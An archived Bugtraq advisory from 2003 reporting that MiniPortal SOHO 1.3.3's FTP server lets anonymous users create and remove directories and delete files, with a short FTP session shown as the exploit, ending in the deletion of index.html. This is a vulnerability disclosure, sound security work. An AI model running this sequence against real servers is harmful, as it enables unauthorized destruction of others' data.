Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

MiniPortal
From: subj <r2subj3ct () dwclan org>
Date: 30 Mar 2003 19:15:25 -0000


Product : MiniPortal SOHO
Version : 1.3.3
OSystem : Windows
Authors : Instant Servers Inc
WebSite : http://www.instantservers.com
Problem : Create and Remove directories with anonymous access

Description:
------------

eng:
====
MiniPortal includes the following components:
WEB Server [Apache 1.3.27]
FTP Server
DNS Server
During research of components of the server, the following was revealed:
The anonymous user can create and delete directories on the server,
And also can delete any files on it.


Exploits:
---------

Telnet 127.0.0.1 21

220 FTP Server, ready

USER anonymous

331 Password required

PASS anonymous () localhost

230 User logged in

MKD test

257 "test" created

RMD test

200 Okay

DELE index.html

200 Okay


Contacts:
---------

r2subj3ct () dwclan org
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc

Thanks:
-------
 DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
 DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.

  By Date           By Thread  

Current thread:
  • MiniPortal subj (Apr 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]